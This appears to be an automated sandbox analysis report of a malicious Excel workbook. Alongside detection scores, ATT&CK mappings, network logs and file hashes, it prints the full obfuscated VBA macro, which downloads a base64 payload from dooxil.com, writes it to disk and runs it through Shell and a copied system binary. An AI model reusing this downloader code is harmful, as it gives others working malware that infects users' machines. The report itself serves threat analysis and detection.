Windows Analysis Report
xls.xls

Overview

General Information

Sample Name:xls.xls
Analysis ID:736957
MD5:109d15a7d33e671ded911d97bc4a15ab
SHA1:c6660d40673400505c70af85dfddc735fa50a39f
SHA256:822d2e533e0537f92fa3ddcbd8cb2a0d7c33ba2ada626e1cae4ecf466ac61e9b
Tags:xls
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains embedded VBA macros
Potential document exploit detected (unknown TCP traffic)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2080 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: xls.xls, ReversingLabs: Detection: 17%
Source: xls.xls, Virustotal: Detection: 39%
Source: xls.xls, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global traffic, TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171
Source: global traffic, DNS query: name: dooxil.com
Source: unknown, DNS traffic detected: queries for: dooxil.com
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown, Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: xls.xls, Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write
Source: xls.xls, OLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti))
Source: xls.xls, OLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))
Source: VBA code instrumentation, OLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)), Name: dimostrargli
Source: xls.xls, Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send
Source: VBA code instrumentation, OLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, send, Name: stupidaggine
Source: xls.xls, OLE indicator, VBA macros: true
Source: xls.xls, ReversingLabs: Detection: 17%
Source: xls.xls, Virustotal: Detection: 39%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR622B.tmp
Source: xls.xls, OLE indicator, Workbook stream: true
Source: classification engine, Classification label: mal68.expl.winXLS@1/0@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts
  • Execution: 41 Scripting; 3 Exploitation for Client Execution; At (Linux)
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
  • Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
  • Defense Evasion: 41 Scripting; Rootkit; Obfuscated Files or Information
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
  • Discovery: 1 File and Directory Discovery; 1 System Information Discovery; Query Registry
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
  • Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 12 Application Layer Protocol
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
  • Impact: Modify System Partition; Device Lockout; Delete Device Data
Source: xls.xls, Detection: 17%, Scanner: ReversingLabs, Label: Win32.Trojan.Valyria
Source: xls.xls, Detection: 40%, Scanner: Virustotal
Source: xls.xls, Detection: 100%, Scanner: Joe Sandbox ML
No Antivirus matches
No Antivirus matches
Source: dooxil.com, Detection: 0%, Scanner: Virustotal
No Antivirus matches
Name: dooxil.com, IP: 91.213.50.111, Active: true, Malicious: false, Reputation: unknown
IP: 91.213.50.111, Domain: dooxil.com, Country: unknown, ASN: 49392, ASN Name: ASBAXETNRU, Malicious: false
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:736957
Start date and time:2022-11-03 12:31:28 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 10s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:xls.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.winXLS@1/0@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to Italian - Italy
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active Picture Object
  • Active AutoShape Object
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe
No simulations
No context
No context
No context
No context
No created / dropped files found
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Enel SpA, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Nov 3 08:32:50 2022, Last Saved Time/Date: Thu Nov 3 08:32:57 2022, Security: 0
Entropy (8bit):5.342866000055418
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:xls.xls
File size:69120
MD5:109d15a7d33e671ded911d97bc4a15ab
SHA1:c6660d40673400505c70af85dfddc735fa50a39f
SHA256:822d2e533e0537f92fa3ddcbd8cb2a0d7c33ba2ada626e1cae4ecf466ac61e9b
SHA512:1789d8a5381b24d58150eefb1748b7fa7c5c0782acf53796b517f258d178d6175d4e78717fd4a64c206fd0ee9d8b9bd29444ccc1ef35a337b8ad50548146ce30
SSDEEP:1536:JcblYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0YtjY+N81LobstcIUvcGJ/uW:2blYkEIuPm3fNRZmbaoFhZhR0cixIHmZ
TLSH:E1630969775AC987D6552F364CE6D7E97336BC40AE9B83073104B73E6F7A6C0C902206
Icon Hash:e4eea286a4b4bcb4
Document Type:OLE
Number of OLE Files:1
Has Summary Info:
Application Name:Microsoft Excel
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
Code Page:1252
Author:
Last Saved By:
Create Time:2022-11-03 08:32:50.891000
Last Saved Time:2022-11-03 08:32:57
Creating Application:
Security:0
Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576
General
Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:Foglio1.cls
Stream Size:13465
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function aspetteremo(traguardo) As Byte()
Dim dorsale() As Byte
Dim sparagli As Integer
sparagli = FreeFile
Open traguardo For Binary Access Read As sparagli
ReDim dorsale(0 To LOF(sparagli) - 1)
Get sparagli, , dorsale
Close sparagli
aspetteremo = dorsale
End Function
Function stupidaggine(ByVal pittore As String) As String
Dim attratto As Object
    Set attratto = CreateObject(ammiratrice("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds", 6))
    attratto.Open ammiratrice("vbGtcrEkbvT", 6), pittore, False
    attratto.send
    stupidaggine = Replace(RTrim(attratto.responseText), " ", "AA")
    Set attratto = Nothing
End Function
Function lasciatela()
lasciatela = Application.DefaultFilePath
End Function
Function dimostrargli(celebrita)
Dim scoperte() As Byte
scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))
frequenta = lasciatela & ammiratrice("O0I01\1VcNBaJ8l0c500.2CCeYxZ190Ke88", 1)
Debug.Print trattasse(scoperte, frequenta)
riporti = frequenta & " " & celebrita & ",#" & 1 & " /q"
riporti = trattasse(scoperte, Shell(riporti))
End Function
Public Function trattasse(benefici() As Byte, ByVal impiego As String)
    Dim improvvisa As Long: improvvisa = FreeFile
    Open impiego For Binary Access Write As improvvisa
    Put improvvisa, 1, benefici
    Close improvvisa
End Function

Function ammiratrice(stabilizzare, d) As String
Dim perseveranza()
ReDim perseveranza(Len(stabilizzare))
For manna = 1 To UBound(perseveranza)
  perseveranza(manna) = Mid(stabilizzare, manna, 1)
Next
For Each litigata In perseveranza
If d < 5 And litigata = LCase(litigata) And Not IsNumeric(litigata) Then
morivano = morivano & litigata
Else
If d > 5 And litigata = UCase(litigata) Then morivano = morivano & litigata
End If
Next
ammiratrice = morivano
End Function
Sub new_espandere()
scomparendo = dimostrargli(neurologo)
End Sub

Function neurologo() As String
valletto = lasciatela & "\" & Int(89573453 * Rnd) + 6880 & "."
trattasse rientrando((Presentava(ammiratrice("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8", 3)))), valletto
neurologo = valletto
End Function
Function Presentava(ByVal dimagrire As String) As String
Dim Wdimagrire As String
Wdimagrire = dimagrire
Presentava = stupidaggine(Wdimagrire)
End Function
Public Function rientrando(ByVal baciarlo As String) As Byte()
    With CreateObject(ammiratrice("9800m4WsYYxA8m66l", 2) & 2 & ammiratrice("74327.Ad700o67mAEdoKcu3Om55eKn55t", 4)).createElement(ammiratrice("3WEb0", 3) & 64)
        .DataType = ammiratrice("AbVK5in4W.b1QasY7e", 3) & 64
        c = 78
        .Text = baciarlo
        foh = 9
        rientrando = .nodeTypedValue
    End With
End Function



General
Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:Questa_cartella_di_lavoro.cls
Stream Size:1203
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:\x1CompObj
File Type:data
Stream Size:117
Entropy:4.295052233063858
Base64 Encoded:True
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:256
Entropy:2.843729876697485
Base64 Encoded:True
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:208
Entropy:3.4571641941803213
Base64 Encoded:False
General
Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16
Stream Size:28945
Entropy:6.62615417319298
Base64 Encoded:True
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:521
Entropy:5.248358244801769
Base64 Encoded:True
General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
File Type:data
Stream Size:104
Entropy:3.331334921988963
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:data
Stream Size:3570
Entropy:4.762300417602462
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:data
Stream Size:4673
Entropy:3.4972369321145735
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:data
Stream Size:452
Entropy:2.541028075676919
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:data
Stream Size:828
Entropy:2.4574353505314255
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:data
Stream Size:6472
Entropy:3.743290714587534
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
File Type:data
Stream Size:680
Entropy:1.3016690799486477
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
File Type:data
Stream Size:106
Entropy:1.3591119461716878
Base64 Encoded:False
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
File Type:data
Stream Size:558
Entropy:6.191417516649333
Base64 Encoded:True
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2022 12:32:40.884675980 CET | 49171 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:32:40.884742975 CET | 443 | 49171 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:32:40.884826899 CET | 49171 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:32:40.912339926 CET | 49171 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:32:40.912385941 CET | 443 | 49171 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:34:50.971307993 CET | 443 | 49171 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:34:50.974256039 CET | 49172 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:34:50.974338055 CET | 443 | 49172 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:34:50.974924088 CET | 49172 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:34:50.975229025 CET | 49172 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:34:50.975250959 CET | 443 | 49172 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:37:02.043514013 CET | 443 | 49172 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:37:02.044492006 CET | 49173 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.044568062 CET | 443 | 49173 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:37:02.044651031 CET | 49173 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.044698000 CET | 49173 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.044794083 CET | 443 | 49173 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:37:02.044852972 CET | 49173 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.378264904 CET | 49174 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.378333092 CET | 443 | 49174 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:37:02.378513098 CET | 49174 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.379266977 CET | 49174 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:37:02.379312992 CET | 443 | 49174 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:39:13.115252018 CET | 443 | 49174 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:39:13.116537094 CET | 49175 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:39:13.116615057 CET | 443 | 49175 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:39:13.116713047 CET | 49175 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:39:13.116962910 CET | 49175 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:39:13.116987944 CET | 443 | 49175 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:41:24.187252045 CET | 443 | 49175 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:41:24.188751936 CET | 49176 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:41:24.188801050 CET | 443 | 49176 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:41:24.188867092 CET | 49176 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:41:24.188935041 CET | 49176 | 443 | 192.168.2.22 | 91.213.50.111
Nov 3, 2022 12:41:24.189090014 CET | 443 | 49176 | 91.213.50.111 | 192.168.2.22
Nov 3, 2022 12:41:24.189147949 CET | 49176 | 443 | 192.168.2.22 | 91.213.50.111
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2022 12:32:40.726948023 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Nov 3, 2022 12:32:40.866636038 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 3, 2022 12:32:40.726948023 CET | 192.168.2.22 | 8.8.8.8 | 0x295c | Standard query (0) | dooxil.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 3, 2022 12:32:40.866636038 CET | 8.8.8.8 | 192.168.2.22 | 0x295c | No error (0) | dooxil.com | | 91.213.50.111 | A (IP address) | IN (0x0001) | false


Target ID:0
Start time:12:32:16
Start date:03/11/2022
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:0x13fc80000
File size:28253536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Call Graph

Nodes:
  • 9 aspetteremo (FreeFile:1)
  • 45 stupidaggine (Replace:1, responseText:1, CreateObject:1, send:1, Open:1, RTrim:1)
  • 99 lasciatela (Application:1)
  • 104 dimostrargli (Print:1, Shell:1, Left:1, Environ:1)
  • 189 trattasse (FreeFile:1)
  • 212 ammiratrice (LCase:1, Len:1, UCase:1, Mid:1, UBound:1)
  • 292 new_espandere
  • 299 neurologo (Rnd:1, Int:1)
  • 339 Presentava
  • 355 rientrando
Edges:
  • 45->212 x 2
  • 104->9
  • 104->99
  • 104->189 x 2
  • 104->212 x 4
  • 292->104
  • 292->299
  • 299->99
  • 299->189
  • 299->212
  • 299->339
  • 299->355
  • 339->45
  • 355->212 x 2

Module: Foglio1

Declaration
Line | Content
1

Attribute VB_Name = "Foglio1"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

APIs | Meta Information

CreateObject

CreateObject("MSXML2.XMLHTTP")

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Open

IXMLHTTPRequest.Open("GET","https://dooxil.com",False)

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

send

Replace

RTrim

responseText

Strings | Decrypted Strings
"fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds"
"MSXML2.XMLHTTP"
"vbGtcrEkbvT"
"GET"
" "
"AA"
Line | Instruction | Meta Information
19

Function stupidaggine(ByVal pittore as String) as String

20

Dim attratto as Object

executed
21

Set attratto = CreateObject(ammiratrice("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds", 6))

CreateObject("MSXML2.XMLHTTP")

executed
22

attratto.Open ammiratrice("vbGtcrEkbvT", 6), pittore, False

IXMLHTTPRequest.Open("GET","https://dooxil.com",False)

executed
23

attratto.send

send

24

stupidaggine = Replace(RTrim(attratto.responseText), " ", "AA")

Replace

RTrim

responseText

25

Set attratto = Nothing

26

End Function

APIs | Meta Information

Part of subcall function lasciatela@Foglio1: DefaultFilePath

Part of subcall function lasciatela@Foglio1: Application

Int

Rnd

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Strings | Decrypted Strings
"N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8"
"https://dooxil.com"
Line | Instruction | Meta Information
64

Function neurologo() as String

65

valletto = lasciatela & "\" & Int(89573453 * Rnd) + 6880 & "."

Int

Rnd

executed
66

trattasse rientrando((Presentava(ammiratrice("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8", 3)))), valletto

executed
67

neurologo = valletto

68

End Function

APIs | Meta Information

Len

Len("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8") -> 55 Len("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds") -> 35 Len("vbGtcrEkbvT") -> 11

UBound

Mid

LCase

IsNumeric

UCase

Line | Instruction | Meta Information
45

Function ammiratrice(stabilizzare, d) as String

46

Dim perseveranza()

executed
47

Redim perseveranza(Len(stabilizzare))

Len("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8") -> 55

executed
48

For manna = 1 To UBound(perseveranza)

UBound

49

perseveranza(manna) = Mid(stabilizzare, manna, 1)

Mid

50

Next

UBound

51

For Each litigata in perseveranza

52

If d < 5 And litigata = LCase(litigata) And Not IsNumeric(litigata) Then

LCase

IsNumeric

53

morivano = morivano & litigata

54

Else

55

If d > 5 And litigata = UCase(litigata) Then

UCase

55

morivano = morivano & litigata

55

Endif

56

Endif

57

Next

58

ammiratrice = morivano

59

End Function

APIs | Meta Information

Part of subcall function stupidaggine@Foglio1: CreateObject

Part of subcall function stupidaggine@Foglio1: Open

Part of subcall function stupidaggine@Foglio1: send

Part of subcall function stupidaggine@Foglio1: Replace

Part of subcall function stupidaggine@Foglio1: RTrim

Part of subcall function stupidaggine@Foglio1: responseText

Line | Instruction | Meta Information
69

Function Presentava(ByVal dimagrire as String) as String

70

Dim Wdimagrire as String

executed
71

Wdimagrire = dimagrire

72

Presentava = stupidaggine(Wdimagrire)

73

End Function

APIs | Meta Information

Part of subcall function dimostrargli@Foglio1: Left

Part of subcall function dimostrargli@Foglio1: Environ

Part of subcall function dimostrargli@Foglio1: Print

Part of subcall function dimostrargli@Foglio1: Shell

Part of subcall function neurologo@Foglio1: Int

Part of subcall function neurologo@Foglio1: Rnd

Line | Instruction | Meta Information
60

Sub new_espandere()

61

scomparendo = dimostrargli(neurologo)

executed
62

End Sub

APIs | Meta Information

DefaultFilePath

Application

Line | Instruction | Meta Information
27

Function lasciatela()

28

lasciatela = Application.DefaultFilePath

DefaultFilePath

Application

executed
29

End Function

APIs | Meta Information

Part of subcall function aspetteremo@Foglio1: FreeFile

Part of subcall function aspetteremo@Foglio1: Open

Part of subcall function aspetteremo@Foglio1: LOF

Left

Environ

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Part of subcall function lasciatela@Foglio1: DefaultFilePath

Part of subcall function lasciatela@Foglio1: Application

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Print

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Part of subcall function trattasse@Foglio1: FreeFile

Part of subcall function trattasse@Foglio1: Open

Shell

Strings | Decrypted Strings
"A7Uc6oP5mAs31p0Ee0c1"
Line | Instruction | Meta Information
30

Function dimostrargli(celebrita)

31

Dim scoperte() as Byte

32

scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))

Left

Environ

33

frequenta = lasciatela & ammiratrice("O0I01\1VcNBaJ8l0c500.2CCeYxZ190Ke88", 1)

34

Debug.Print trattasse(scoperte, frequenta)

Print

35

riporti = frequenta & " " & celebrita & ",#" & 1 & " /q"

36

riporti = trattasse(scoperte, Shell(riporti))

Shell

37

End Function

APIs | Meta Information

Part of subcall function ammiratrice@Foglio1: Len

Part of subcall function ammiratrice@Foglio1: UBound

Part of subcall function ammiratrice@Foglio1: Mid

Part of subcall function ammiratrice@Foglio1: LCase

Part of subcall function ammiratrice@Foglio1: IsNumeric

Part of subcall function ammiratrice@Foglio1: UCase

Strings | Decrypted Strings
"AbVK5in4W.b1QasY7e"
Line | Instruction | Meta Information
74

Public Function rientrando(ByVal baciarlo as String) as Byte()

75

With CreateObject(ammiratrice("9800m4WsYYxA8m66l", 2) & 2 & ammiratrice("74327.Ad700o67mAEdoKcu3Om55eKn55t", 4)).createElement(ammiratrice("3WEb0", 3) & 64)

76

.DataType = ammiratrice("AbVK5in4W.b1QasY7e", 3) & 64

77

c = 78

78

.Text = baciarlo

79

foh = 9

80

rientrando = .nodeTypedValue

81

End With

82

End Function

APIs | Meta Information

FreeFile

Open

LOF

Line | Instruction | Meta Information
9

Function aspetteremo(traguardo) as Byte()

10

Dim dorsale() as Byte

11

Dim sparagli as Integer

12

sparagli = FreeFile

FreeFile

13

Open traguardo For Binary Access Read As sparagli

Open

14

Redim dorsale(0 To LOF(sparagli) - 1)

LOF

15

Get sparagli, , dorsale

16

Close sparagli

17

aspetteremo = dorsale

18

End Function

APIs | Meta Information

FreeFile

Open

Line | Instruction | Meta Information
38

Public Function trattasse(benefici() as Byte, ByVal impiego as String)

39

Dim improvvisa as Long

39

improvvisa = FreeFile

FreeFile

40

Open impiego For Binary Access Write As improvvisa

Open

41

Put improvvisa, 1, benefici

42

Close improvvisa

43

End Function

Module: Questa_cartella_di_lavoro

Declaration
Line | Content
1

Attribute VB_Name = "Questa_cartella_di_lavoro"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True
